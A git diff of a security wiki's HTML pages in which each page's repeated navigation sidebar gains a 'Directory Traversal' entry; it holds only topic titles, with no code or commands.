      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/index.html b/docs/Reverse Engineering/Binary Formats/index.html index 90cc7dbb..23d7b294 100644 --- a/docs/Reverse Engineering/Binary Formats/index.html +++ b/docs/Reverse Engineering/Binary Formats/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Reverse Engineering/Program Anatomy/Instructions.html b/docs/Reverse Engineering/Program Anatomy/Instructions.html index 2225314d..39c09dec 100644 --- a/docs/Reverse Engineering/Program Anatomy/Instructions.html +++ b/docs/Reverse Engineering/Program Anatomy/Instructions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

jz / jnz - - diff --git a/docs/Reverse Engineering/Program Anatomy/Registers.html b/docs/Reverse Engineering/Program Anatomy/Registers.html index efba8b6a..1554c784 100644 --- a/docs/Reverse Engineering/Program Anatomy/Registers.html +++ b/docs/Reverse Engineering/Program Anatomy/Registers.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
